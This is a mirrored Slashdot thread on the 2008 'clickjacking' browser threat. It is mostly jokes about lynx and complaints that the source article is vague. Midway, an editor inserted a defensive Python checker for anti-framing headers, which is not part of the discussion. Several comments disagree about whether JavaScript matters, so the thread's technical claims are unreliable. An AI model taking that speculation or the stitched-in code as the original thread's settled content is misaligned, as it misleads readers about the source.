Slashdot Mirror


Alarm Raised For "Clickjacking" Browser Exploit

Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at the request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"

308 comments

  1. Hurray for us lynx users! by Anonymous Coward · · Score: 5, Funny

    *crickets*

    1. Re:Hurray for us lynx users! by Anonymous Coward · · Score: 0

      I was wondering who used lynx. I guess it's the crickets.

    2. Re:Hurray for us lynx users! by PIBM · · Score: 1

      Actually, I was using it yesterday ... I wish there was javascript support in lynx, I could not manage to log in to Gmail, even using the basic interface :(

    3. Re:Hurray for us lynx users! by saveth · · Score: 4, Informative

      Hmm, I'm able to use lynx to log into Gmail. Granted, I had to accept a million cookies and other things along the way.

      Lynx Version 2.8.6rel.4 (15 Nov 2006)
      libwww-FM 2.14, SSL-MM 1.4.1, GNUTLS 1.6.2, ncurses 5.6.20080308(wide)
      Built on linux-gnu May 2 2007 08:54:50

    4. Re:Hurray for us lynx users! by thetoadwarrior · · Score: 3, Informative

      I often use it when I SSH into my home PC and I need to grab something to install on it or whatever. I use it as a rough guide for site usability too. Lynx still has its place, imo.

    5. Re:Hurray for us lynx users! by Thaelon · · Score: 2, Interesting

      Hey I use lynx you insensitive clod!

      The reason you can't "clickjack"* is cause it's a text based browser. There ain't no clicking!

      *I didn't RTFA, so I don't know how appropriate this term is.

      --

      Question everything

    6. Re:Hurray for us lynx users! by davester666 · · Score: 2, Funny

      Yes, if you use lynx, you get textjack'ed instead...

      --
      Sleep your way to a whiter smile...date a dentist!
    7. Re:Hurray for us lynx users! by garaged · · Score: 1

      I use links2 usually, not lynx, but still lynx is useful for a couple of things, like dumping headers easy/fast, and to download remotely from console :)

      --
      I'm positive, don't believe me look at my karma
    8. Re:Hurray for us lynx users! by Adambomb · · Score: 4, Funny

      Or Holdingdownholdingdownholdingdowncrapupupupenter-jacked.

      --
      Ice Cream has no bones.
    9. Re:Hurray for us lynx users! by Anonymous Coward · · Score: 0

      for a second i thought you said hypnotoad. All hail the hypnotoad!

      http://r33b.net/

    10. Re:Hurray for us lynx users! by steelersteve13 · · Score: 1

      no articles on wikipedia yet.

      --
      Can my karma get any worse than bad? Let's find out!
    11. Re:Hurray for us lynx users! by kelnos · · Score: 4, Informative

      I didn't RTFA, so I don't know how appropriate this term is.

      Don't worry, you didn't miss anything. The article basically says, "OMG WE ARE ALL SO PWNED!!111. But we're not going to tell you why."

      --
      Xfce: Lighter than some, heavier than others. Just right.
    12. Re:Hurray for us lynx users! by memco · · Score: 1

      Progressive enhancement FTW!

      --
      Get me a meat pie floater!
    13. Re:Hurray for us lynx users! by reezle · · Score: 1

      Thanks, I read the article and wondered if it was just me.
      Wonderful synopsis....

    14. Re:Hurray for us lynx users! by BenJaminus · · Score: 1

      FTA

      With this exploit, once you're on the malicious web page, the bad guy can make you click on any link

      I think what they are hinting at is that if your browser automatically fills in forms for you, a malicious website could have a form and then automatically submit the data.

    15. Re:Hurray for us lynx users! by flosofl · · Score: 1

      No, it's an IFRAME issue. A hidden IFRAME is created *under* the main page. Any click you make will also fall to the IFRAME under the main page. It appears JavaScript makes it easier but it's not necessary. I think this sounds like a DHTML problem (as in either the protocol or how it's rendered)

      At least that's what I understand from the "how to stop this with NoScript" link in TFA. Basically if you turn off all IFRAMES in NoScript you can't get pwned.

      --
      "This calls for a very special blend of psychology and extreme violence" - Vyvyan "The Young Ones"
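
The page-side defence against the hidden-IFRAME trick flosofl describes, as an added example that is not from this thread or from any vendor: a checker that reads a response's X-Frame-Options header and Content-Security-Policy frame-ancestors directive (the two standard anti-framing controls) and reports whether a given framing origin would be refused. The bank/attacker/partner hostnames and the sample header sets are constructed for the example; it assumes the CSP directive wins when both headers are present, as current browsers do, and requires an exact scheme match for host-sources.

```python
"""Anti-framing header check for clickjacking defence (constructed example).

A clickjacking page loads the victim site in an invisible <iframe> under a
decoy, so the defender's question about any sensitive response is: does it
tell the browser to refuse framing?  Two headers answer that: the legacy
X-Frame-Options header and the Content-Security-Policy frame-ancestors
directive.  Assumed here: when both are present the CSP directive wins (as
current browsers do), and host-source matching requires an exact scheme.
"""
from urllib.parse import urlsplit

BLOCKED, ALLOWED, UNPROTECTED = "blocked", "allowed", "unprotected"


def _origin(url):
    """Reduce a URL to the (scheme, host, port) triple browsers compare."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return scheme, (p.hostname or "").lower(), p.port or (443 if scheme == "https" else 80)


def _host_source_matches(source, framer):
    """Match one CSP host-source such as https://*.partner.example against framer."""
    fscheme, fhost, fport = framer
    src = source.lower()
    if src.endswith(":") and "/" not in src:       # bare scheme-source, e.g. "https:"
        return fscheme == src[:-1]
    if "://" not in src:                            # scheme-less host inherits framer's
        src = fscheme + "://" + src
    sscheme, shost, sport = _origin(src)
    if (sscheme, sport) != (fscheme, fport):
        return False
    if shost.startswith("*."):                      # wildcard covers subdomains only
        return fhost.endswith(shost[1:])
    return shost == fhost


def _frame_ancestors(headers):
    """Return the frame-ancestors source list, or None when the directive is absent."""
    csp = headers.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def framing_verdict(headers, page_url, framer_url):
    """Classify whether framer_url may embed the page served with these headers."""
    headers = {k.lower(): v.strip() for k, v in headers.items()}
    page, framer = _origin(page_url), _origin(framer_url)
    sources = _frame_ancestors(headers)
    if sources is not None:                          # CSP present: it decides
        for s in sources:
            if s.lower() == "'none'":
                return BLOCKED
            if s.lower() == "'self'":
                if page == framer:
                    return ALLOWED
            elif _host_source_matches(s, framer):
                return ALLOWED
        return BLOCKED                               # empty or unmatched list blocks
    xfo = headers.get("x-frame-options")
    if xfo is None:
        return UNPROTECTED
    values = {v.strip().upper() for v in xfo.split(",") if v.strip()}
    if len(values) != 1:                             # conflicting values are ignored
        return UNPROTECTED
    value = values.pop()
    if value == "DENY":
        return BLOCKED
    if value == "SAMEORIGIN":
        return ALLOWED if page == framer else BLOCKED
    if value.startswith("ALLOW-FROM "):              # legacy form, widely unsupported
        return ALLOWED if _origin(value[11:].lower()) == framer else BLOCKED
    return UNPROTECTED                               # unknown token: browsers ignore it


# Constructed responses standing in for a sensitive page at https://bank.example/.
SAMPLES = {
    "no_header": {"Content-Type": "text/html"},
    "xfo": {"X-Frame-Options": "SAMEORIGIN"},
    "csp": {"Content-Security-Policy":
            "default-src 'self'; frame-ancestors 'self' https://*.partner.example"},
    "both": {"X-Frame-Options": "DENY",
             "Content-Security-Policy": "frame-ancestors 'self'"},
}


def audit(page_url="https://bank.example/", framer_url="https://attacker.example/"):
    """Verdict per sample for a hypothetical cross-site framer."""
    return {name: framing_verdict(h, page_url, framer_url) for name, h in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:10s} {verdict}")
```

Only "no_header" comes back unprotected against the cross-site framer; the same check run against your own responses is the quickest way to find pages that would fall through to a hidden frame.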
    16. Re:Hurray for us lynx users! by Anonymous Coward · · Score: 0

      Lynx rox!!!

    17. Re:Hurray for us lynx users! by Deagol · · Score: 1

      So nice to see another Plastic reader here on Slashdot.

    18. Re:Hurray for us lynx users! by LunarCrisis · · Score: 1

      Those of us who browse with wget/less are safe too!

      --
      Mr. Period: Nine is the one that's right by ten!
      Nine: One day I will kill him. Then, I will be Ten.
    19. Re:Hurray for us lynx users! by Mr.+Jaggers · · Score: 1

      Umm. Or you could just use your mouse in links. I do.

      http://links.sourceforge.net/docs/manual-0.82-en/links-usage-mouse.html

      --

      When I grow up, I want to have Christopher Walken hair.
  2. Go Lynx! by ag3ntugly · · Score: 2, Funny

    I knew there was a reason I liked lynx

    --
    i have a roll of electrical tape.
    1. Re:Go Lynx! by Anonymous Coward · · Score: 0

      Besides speed, simplicity, clean interface and no freaking frills?

    2. Re:Go Lynx! by Anonymous Coward · · Score: 0

      Yes, that reason is that you haven't tried w3m or links yet.

    3. Re:Go Lynx! by ag3ntugly · · Score: 1, Offtopic

      Actually, I use links quite a bit because, as I said in another post, when I click on links in Links, it works (at least in a PuTTY window)

      --
      i have a roll of electrical tape.
    4. Re:Go Lynx! by lysergic.acid · · Score: 4, Insightful

      i wouldn't exactly call the ability to render images "frills." i can understand if this were 1990 and the web was still mostly text-based. but the idea of a hypertext network and hypertext documents is to go beyond what normal text documents/interfaces could provide.

      lynx has its merits, but calling all standard browsers too complicated or excessive is stretching it a bit. if lynx were just a basic browser that didn't have plugins, tabs, adblock, RSS readers, bookmarks, search tools, etc. then you could claim that other browsers have too many frills.

      but lynx is a text-only browser. that's like saying a radio is a TV without the frills. stripping out core features does not make something have a cleaner interface or mean that the removed features are unnecessary.

    5. Re:Go Lynx! by Korin43 · · Score: 1

      Saying that images are a core feature of the web really depends on what you use it for. I can use Slashdot, check my mail, do google searches, check out Wikipedia.. all without any images.

      Going back to your TV example, sometimes I'll turn on the news and go into another room where I can still hear it. Sure, the news is more entertaining when you can see the kitten that got rescued, but sometimes all you want is the text.

    6. Re:Go Lynx! by Adam+Hazzlebank · · Score: 1

      You probably want something more modern like Links or w3m: www2u.biglobe.ne.jp/~hsaka/w3m/nec.png

    7. Re:Go Lynx! by hairyfeet · · Score: 0, Redundant

      For those on Win95-XP, or those that carry a thumbstick and would like a similar small, ultra fast browser that works great on a stick, might I suggest OffByOne? It is small (1.2Mb), very fast, easy to install to a stick or PC (just unzip), and as a nice bonus it also supports tabs. I have found this to be a great little addition to my thumbstick, and it really flies. But as always this is my 02c, YMMV

      --
      ACs don't waste your time replying, your posts are never seen by me.
    8. Re:Go Lynx! by hairyfeet · · Score: 2, Informative

      If you are wanting a tiny browser that does images, try OffByOne. It's a really great little browser, with full HTML 3.2 support. Of course some sites like Yahoo will complain that they can run all their scripts, but the links and images work just fine. And at 1.2Mb with a simple zip folder it is really easy to drop onto a thumbstick for quick browsing on the go. But as always this is my 02c, YMMV

      --
      ACs don't waste your time replying, your posts are never seen by me.
    9. Re:Go Lynx! by lysergic.acid · · Score: 1

      don't get me wrong, i think lynx is a great program. like i said earlier, it has its merits. but it's not a full-featured browser. and implying that it simply lacks the "frills" of standard browsers is ignoring a large part of the media and non-text components of the web.

      if all browsers were text-only, imagine how limited the web would be. the web probably wouldn't have evolved to be as advanced or useful as it is today. you may as well just stick with a BBS or the Gopher protocol.

      i think most people would find lynx very lacking if they tried to use it as primary browser. and that's not because its interface is cleaner or because it lacks frills.

    10. Re:Go Lynx! by e4g4 · · Score: 1

      But as always this is my 02c, YMMV

      You say that so frequently that you may want to consider putting it into your signature.

      --
      The secret to creativity is knowing how to hide your sources. - Albert Einstein
    11. Re:Go Lynx! by tobiasly · · Score: 1

      but lynx is a text-only browser. that's like saying a radio is a TV without the frills. stripping out core features does not make something have a cleaner interface or mean that the removed features are unnecessary.

      Pffftt.. images may be "necessary" to you, but not all of us. Just this weekend I wrote a Perl script to render Flickr images in ASCII art. You can keep your fancy schmancy "images".

    12. Re:Go Lynx! by Anonymous Coward · · Score: 1, Interesting

      Ahem. Not everyone can actually see images. Lynx is quite popular among the visually handicapped (IE + Jaws is another popular choice). If your website follows standards, it should be accessible to the visually impaired.

    13. Re:Go Lynx! by Urkki · · Score: 1

      Saying that images are a core feature of the web really depends on what you use it for.

      I disagree. "Core feature" isn't defined by an individual user. Even if you don't need or use a feature, it may still be a core feature of the WWW. And the other way around, even if you use the web for tunneling other protocols over HTTP, that still doesn't make tunneling a core feature of the web, no matter how important it is to you.

      I'd say that the core idea of the original web can be summarized as "hyperlinking documents that combine several forms of media". Lynx fails the "combine several forms of media" part (even if you can separately display the images with an external viewer, that's more like separating several forms of media that were meant to work together ;-).

      "Web 2.0" then brings additional core ideas, basically dynamic interactivity, but that's another matter.

    14. Re:Go Lynx! by houghi · · Score: 1

      That is why I'd rather use w3m or links instead of lynx.

      At least in those two some of the layout is kept. Lynx however is great in scripting.

      --
      Don't fight for your country, if your country does not fight for you.
    15. Re:Go Lynx! by Fred_A · · Score: 1

      If you are wanting a tiny browser that does images, try OffByOne. It's a really great little browser, with full HTML 3.2 support.

      And unlike Lynx, it has the advantage of only running in Windows. Yay. Down with those pesky portable programs!

      --

      May contain traces of nut.
      Made from the freshest electrons.
    16. Re:Go Lynx! by skeeto · · Score: 1

      i can understand if this were 1990 and the web was still mostly text-based.

      Considering that the web didn't really exist until 1993, I would say it was based on nothing at that point. :-P

    17. Re:Go Lynx! by lysergic.acid · · Score: 1

      hey, he created it in 1989, he just didn't release it until 1993!

      i was just talking about the early alpha. =P

    18. Re:Go Lynx! by Mattsson · · Score: 1

      There are lots of quite informative pictures on wikipedia too. =)

      --
      /.Mattsson - My native language is not English, so please don't whine over linguistic errors. (That's lame anyway...)
  3. The first thing I thought of by Anonymous Coward · · Score: 4, Funny

    was some weird mouse-mastubation scenario. *shudders*

    1. Re:The first thing I thought of by couchslug · · Score: 2, Funny

      "The first thing I thought of was some weird mouse-mastubation scenario."

      "Mastubation"?? I'm picturing small rodents with catheters....

      Even my capybara Lemmiwinks thinks THAT is sick.

      --
      "This post is an artistic work of fiction and falsehood. Only a fool would take anything posted here as fact."
    2. Re:The first thing I thought of by secolactico · · Score: 1

      was some weird mouse-mastubation scenario. *shudders*

      "Mousturbation"? Ok, I'll shut up now.

      --
      No sig
    3. Re:The first thing I thought of by rubah · · Score: 1

      well, we have nipples on laptops that act as mice, and the scrolling action on three-button mice is pretty analogous to *sniped*

    4. Re:The first thing I thought of by Anonymous Coward · · Score: 0

      Mousturbation: The act of repeatedly clicking on a non-responsive object to the point that when it eventually DOES respond, you feel like you've just had an orgasm.

  4. Turn to Lynx? by TheDarkMaster · · Score: 2, Insightful

    Well, they can't steal clicks from a browser without clicks

    --
    Religion: The greatest weapon of mass destruction of all time
    1. Re:Turn to Lynx? by ag3ntugly · · Score: 1, Redundant

      Precisely, but I wonder if Links is vulnerable? It's text based just like lynx but when I use putty to ssh into my box at home, and run Links, I can click on links and buttons and it works.

      --
      i have a roll of electrical tape.
    2. Re:Turn to Lynx? by AKAImBatman · · Score: 3, Informative

      Precisely, but I wonder if Links is vulnerable?

      Lynx and Links do not support IFrames, so they are not vulnerable. In fact, any browser not capable of advanced CSS and/or IFrames is safe. Unfortunately, that's not very many browsers.

      /me just checked email to find an official conversation going on about ClickJacking.

    3. Re:Turn to Lynx? by fataugie · · Score: 1

      Great News!
      My Mosaic 1.0 is safe!

      --

      WTF? Over?

    4. Re:Turn to Lynx? by Anonymous Coward · · Score: 0

      Precisely, but I wonder if Links is vulnerable?

      Lynx and Links do not support IFrames, so they are not vulnerable. In fact, any browser not capable of advanced CSS and/or IFrames is safe. Unfortunately, that's not very many browsers.

      /me just checked email to find an official conversation going on about ClickJacking.

      Have NoScript FF extension installed and set it to disable iframes.

    5. Re:Turn to Lynx? by Anonymous Coward · · Score: 0

      It's a reference to IRC - if you didn't catch that one suspects you are the younger here...

    6. Re:Turn to Lynx? by Anonymous Coward · · Score: 5, Funny

      I hate to burst your bubble, but it does not mean I'm 12. It means that I'm older than sin.

      You young'uns these days just don't understand anything that has a black rope coming out the back. It's got to be all "txtm3 or gtfo". 4COL. Well, @TEOTD I have a message for you, young man! GOML* and GAL! --AKAIB

      * Get Off My Lawn

    7. Re:Turn to Lynx? by Anonymous Coward · · Score: 0

      Opera has an option to disable iframes, if I'm not mistaken.

    8. Re:Turn to Lynx? by Mr2001 · · Score: 1

      That page gets /describe totally wrong, BTW. You can't forge emotes from other people. The command sends an emote to someone else, privately.

      --
      Visual IRC: Fast. Powerful. Free.
    9. Re:Turn to Lynx? by Anonymous Coward · · Score: 0

      You've never heard of IRC? Why do they give mod points to someone as tech-clueless as you?

    10. Re:Turn to Lynx? by jonadab · · Score: 1

      You young whippersnappers these days think you know everything. Haven't you ever seen a MUD?

      --
      Cut that out, or I will ship you to Norilsk in a box.
  5. Information by asCii88 · · Score: 5, Insightful

    You call this "information"? It's not even clear what the exploit is about.

    1. Re:Information by eln · · Score: 5, Funny

      It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

      Have a nice day.

    2. Re:Information by AKAImBatman · · Score: 5, Informative

      It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

    3. Re:Information by Anonymous Coward · · Score: 0, Offtopic

      It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

      Sounds like every corporate and republican (arguably the same thing) pitch I've heard since the fall of '01.

      Boo! Be very afraid, but we will keep you safe.

      (By stunning coincidence, my captcha is (wait for it): fleece)

    4. Re:Information by hesaigo999ca · · Score: 1

      Autoclicker...no?

    5. Re:Information by Kaptainkid · · Score: 5, Funny

      For additional support information. Click this link. LOL

    6. Re:Information by AaxelB · · Score: 2, Funny

      And, suspiciously, TFA itself is hidden behind a link! Do they really expect us to click it??

      ...I did click it. What a useless article.

      It's a fundamental flaw with the way your browser works and cannot be fixed with a simple patch.

      Oh no! There's nothing we can do!

      In the meantime, the only fix is to disable browser scripting and plugins.

      Uh... wha? I thought it didn't have to do with browser scripting and plugins?

      So it's big and scary and you can't protect against it, except by taking basic precautions to protect yourself against it. I see.

    7. Re:Information by HikingStick · · Score: 4, Funny

      You mean like the way the new Slashdot interface causes a lot of the comments to overlap, so you think you're clicking on that +3 Interesting one and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse, I mean.

      --
      I use irony whenever I can, but my shirts are still wrinkled...
    8. Re:Information by OriginalArlen · · Score: 5, Insightful

      There's a big difference. The first public news of the Kaminsky DNS issue was with the release of Microsoft's Patch Tuesday DNS update, with simultaneous patches from ISC for BIND and the other affected nameservers. Dan organised all that with the help of CERT and the DNS server vendor/distributors, without leaks. Once the patches and a vague description were out, people put two and two together pretty quickly - IIRC from the BlackHat preso, the first correct solution Kaminsky received was within 48 hours - and shrewd guesses were being made within two weeks (followed by the unfortunate leak which broadly confirmed the guess.) It sounds like the cat is well and truly out of the bag here, already, and there are no patches yet. Apart from the people at the conference, there's enough detail in the sources the ZDNet blog links to to make it pretty clear which direction the shrewd guesses (and testing) will have started on.

      Looking on the bright side, more browsers than nameservers auto-update themselves...

      (Incidentally the reason the Internet wasn't destroyed by the Kaminsky bug was precisely because of all the prior coordination and then unequivocal "patch now" messages from multiple credible sources (CERT, Vixie, Microsoft, the other respected researchers Dan explained it to under NDA, etc.) And anyway you ARE still fucked in the long run, anyway, because DNS is still spoofable by a determined attacker (which probably means one who's going after a very high value target) in the absence of DNSSEC. Hence the (by Fed terms, frantic) haste with which the .gov root is being signed at last.

      Have a great day!

      --

      Everything I needed to know about life, I learnt from Blake's Seven
    9. Re:Information by lysergic.acid · · Score: 5, Funny

      i still don't get it. could you give an analogy involving cars?

    10. Re:Information by Hatta · · Score: 2, Funny

      Sounds like our economy right about now.

      --
      Give me Classic Slashdot or give me death!
    11. Re:Information by cmacb · · Score: 1

      Researchers are beginning to raise an alarm for what looks like a scary new browser exploit/threat affecting all the major desktop platforms -- Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

      Obviously the word "platform" is hot in media circles these days.

      I noticed Linux isn't in there. Does that mean Linux is not a platform? If I run Firefox on Linux am I safe? If I run Firefox on OS X am I safe?

      This is one reason I don't follow the news on ZDnet any more.

    12. Re:Information by AKAImBatman · · Score: 5, Insightful

      Sure. Imagine you're in a car showroom looking at a super-expensive car. It looks great and price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

      Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car. NOT FUNNY!

      Better? :-P

    13. Re:Information by Spy+der+Mann · · Score: 1

      How about this: Your name is Heather and you're trapped in Silent Hill. After beating the crap out of a monster, you realize that all the spooky playground was some CSS delusion and you ended up screwing innocent ppls' lives.

      That would've been a pretty cool ending for SH3, btw, but I hope it helps explaining what this exploit really is about. So, in other words, if you see a flash ad saying "click to win a prize", now you can know what the prize is ;-)

    14. Re:Information by Anonymous Coward · · Score: 0

      It's like a balloon, with too much air.

    15. Re:Information by collinstocks · · Score: 1

      You call this "information"? It's not even clear what the exploit is about.

      I agree entirely. What ever happened to "full disclosure"? Haven't most people concluded that it is a good idea, at this point?

    16. Re:Information by Mad+Merlin · · Score: 2, Interesting

      But here's the best part (from the article):

      The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.

      Ebay, for example, would be vulnerable to this since you could embed javascript into the web page, although, javascript is not required to exploit this.

      In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now.

      So, the exploit has nothing to do with Javascript, but Javascript makes it easier, and the only way to protect yourself is to disable Javascript (and plugins). Wonderful!

    17. Re:Information by ahodgson · · Score: 1

      Just give me a check for $700 billion, and I'll fix it for you. I know, I know, as recently as 2 months ago, I told you there was no problem. And if there is a problem, it's one caused by my friends and ex co-workers. Who, coincidentally, I will be giving your $700 billion to. But I'm the man to fix it. Really.

    18. Re:Information by Anonymous Coward · · Score: 0

      "You call this "information"? It's not even clear what the exploit is about." - by asCii88 (1017788) on Thursday September 25, @04:24PM (#25156725) Homepage

      IFrames, &/or Plugins (specifically Adobe Flash is my guess here) are what you need to worry about... though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here).

      APK

      P.S.=> I've been telling folks to 'crank those off', as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites)), here, for more than a year now:

      HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

      http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

      apk

    19. Re:Information by Anonymous Coward · · Score: 0

      Full and responsible disclosure is better.

    20. Re:Information by Cousin+Scuzzy · · Score: 5, Funny

      Better? :-P

      Well, That's better than simply turning on the radio when you needed to eject.

    21. Re:Information by Repton · · Score: 1

      So, you're saying that I go to a web page, click on some link, and the CSS or javascript rewrites it so that I'm actually redirected to some other link? That doesn't match the description in TFA -- the way it talks, all I have to do is visit a malicious website, and suddenly my browser is sending through clicks for anything they want me to click, and I don't have to do anything.

      --
      Repton.
      They say that only an experienced wizard can do the tengu shuffle.
    22. Re:Information by Repton · · Score: 1

      You mean this picture?

      --
      Repton.
      They say that only an experienced wizard can do the tengu shuffle.
    23. Re:Information by howardd21 · · Score: 1

      Maybe I am crazy, but that might be the funniest thing I have ever read on here.

      --
      no comment
    24. Re:Information by Anonymous Coward · · Score: 1, Funny

      HikingStick says: " ... and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse ..."

      You mean DNC veep Joe Biden in a bikini?

    25. Re:Information by RiotingPacifist · · Score: 1

      but what can you actually do with this?
      if i understand this correctly:
      if you visit badsiteA it can force your browser to badsiteB
      but as BadsiteA can already malware you up there is no point
      Perhaps if it can be used across tabs then the old browsers (not IE8 / chrome) are vulnerable to changing banktab to badsitetab without you noticing

      --
      IranAir Flight 655 never forget!
    26. Re:Information by enoz · · Score: 2, Interesting

      I would have classed that article as FUD, except that there are too many obvious contradictions.

      Instead it just looks like some incoherent disinformation from someone who does not know the difference between a browser and a plugin.

      a scary new browser exploit/threat affecting all the major desktop platforms - Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

      That's where I stopped taking the article seriously. Unfortunately that was also the first paragraph.

    27. Re:Information by westyvw · · Score: 2

      Slashdot has ads?

    28. Re:Information by felipekk · · Score: 1

      Agreed 100%...

    29. Re:Information by MrZilla · · Score: 1

      I saw people above mention iFrames, which probably means that you could put this into an ad service, have it serve your iFrame on GoodSiteA, thus forcing all clicks on that site to BadSiteB.

      --
      mov ax, 4c00h
      int 21h
    30. Re:Information by cavebison · · Score: 1

      It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

      Hey I might try that on my girlfriend!

      Ah, who am I kidding.

    31. Re:Information by Anonymous Coward · · Score: 0

      The first public news about this issue was _AGES_ ago, Kaminsky only pressed the Hypebutton loudly.

      1995:

      2004:

    32. Re:Information by jonadab · · Score: 1

      Yeah, if you'd kept reading, you'd have noticed that they also said at least three times that it didn't require Javascript, and then went on to explain that it requires DHTML and can be done with "browser scripting" instead of Javascript.

      --
      Cut that out, or I will ship you to Norilsk in a box.
    33. Re:Information by sholsinger · · Score: 1

      Okay, so the exploit requires DHTML. But DHTML is javascript manipulating the elements on a page... So how exactly does it not require javascript?

      From the Wikipedia entry:

      Dynamic HTML, or DHTML, is a collection of technologies used together to create interactive and animated web sites by using a combination of a static markup language (such as HTML), a client-side scripting language (such as JavaScript), a presentation definition language (such as CSS), and the Document Object Model.

      Okay, so really it could be any client-side scripting language. Aside from javascript what does that leave? Jscript? VBScript? Which browser supports those? Oooh, right IE.

    34. Re:Information by canajin56 · · Score: 1

      It doesn't have to do with browser scripting and plugins. But if you turn browser scripting and plugins off, whatever trojan/worm/virus they have on the site they are using this trick to link you to, won't infect you.

      --
      ASCII stupid question, get a stupid ANSI
    35. Re:Information by Intron · · Score: 1

      --
      Intron: the portion of DNA which expresses nothing useful.
    36. Re:Information by Apache · · Score: 1

      For additional support information, click just about anywhere and our hidden iframe will take you there.

    37. Re:Information by Jon_S · · Score: 1

      Yes, that is the first time I laughed out loud at work in 10+ years of reading /.

    38. Re:Information by Vlad_the_Inhaler · · Score: 1

      I tried the Demo and it failed to do anything to my browser 'cos I don't have the Flash plugin installed.

      Seamonkey 1.0.9 (not exactly the newest)
      Suse 10.1 (not exactly the newest).

      On my Windows XP machine at work, I upgraded to Firefox 3 a few months back. FF 2.x had not played Flash adverts (I avoided installing Flash there as well) but 3.0 does. This means FF 3.0 levels come with Flash enabled? It seems strange.

      --
      Mielipiteet omiani - Opinions personal, facts suspect.
    39. Re:Information by mrdoogee · · Score: 1

      That's what I'd like to know. Is this a problem just for Windows users? If so, that's bad, but it really doesn't affect me since I use OS X at work and Linux at home. However, I would like to know if I should be ratcheting Noscript up a couple notches anyway.

    40. Re:Information by Intron · · Score: 1

      http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_15523 Flash can cover up form buttons, etc. The article suggests disabling all plugins, not Javascript.

      --
      Intron: the portion of DNA which expresses nothing useful.
  6. Never gonna... by null+etc. · · Score: 4, Funny

    Oh great. Expect a resurgence in rickrolls. No one can protect you!

    1. Re:Never gonna... by Theoboley · · Score: 0

      If that were the most of our worries here, It'd be hilarious! Sadly, all your computers are belong to this clickjacking....

      --
      Stupidity only gets you so far, then you've gotta try
    2. Re:Never gonna... by nine-times · · Score: 2, Funny

      With all the horrible things on the Internet, you're worried about rickrolls? Have some priorities.

      We're all going to end up seeing goatse.cx again.

    3. Re:Never gonna... by Joe+Snipe · · Score: 4, Funny

      We're all going to end up seeing goatse.cx again.
      yeah but now it will have Rick Astley playing in the background...

      --
      Sometimes, life itself is sarcasm...
    4. Re:Never gonna... by Kvasio · · Score: 2, Funny

      yeah but now it will have Rick Astley playing in the background...

      Do you mean his music or that Rick will be on "giver.jpg" this time?

    5. Re:Never gonna... by uxr · · Score: 1, Funny

      We're all going to end up seeing goatse.cx again.

      So it's just going to redirect me to my homepage?

    6. Re:Never gonna... by BarryJacobsen · · Score: 1

      We're all going to end up seeing goatse.cx again. yeah but now it will have Rick Astley playing with himself in the background...

      Fixed :P

    7. Re:Never gonna... by Anonymous Coward · · Score: 0

      We're all going to end up seeing goatse.cx again.

      yeah but now it will have Rick Astley playing in the background...

      fap fap fap

    8. Re:Never gonna... by Anonymous Coward · · Score: 0

      Awesome idea! I'll get right on it!

    9. Re:Never gonna... by Anonymous Coward · · Score: 0

      Man.. I can see it now, that bad, bad music with a bouncing gaping a-hole in beat with the music.. It's now in my nightmares, thanks slashdot.

  7. FF 3.0.2 safe? by DavidR1991 · · Score: 2, Informative

    Fairly certain this is one of the listed fixes for 3.0.2, but I could be wrong (Or is this _another_ kind of clickjacking flaw?)

    1. Re:FF 3.0.2 safe? by Anonymous Coward · · Score: 1, Informative
    2. Re:FF 3.0.2 safe? by erroneus · · Score: 2, Insightful

      That's not it because the description says that disabling Javascript will not help. The bug indicated by you says disabling Javascript will help.

  8. Clickjacking? by Anonymous Coward · · Score: 0

    Isn't that what happens *after* you visit a pr0n site?

    1. Re:Clickjacking? by Anonymous Coward · · Score: 0

      (Score: -1, *Yawn*)

  9. Summary wrong by mazarin5 · · Score: 5, Informative

    The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'

    The quote from the article says you can protect yourself by disabling scripting:

    In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now.

    --
    Fnord.
    1. Re:Summary wrong by Free+the+Cowards · · Score: 4, Informative

      The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.

      --
      If you mod me Overrated, you are admitting that you have no penis.
    2. Re:Summary wrong by Aphoxema · · Score: 1

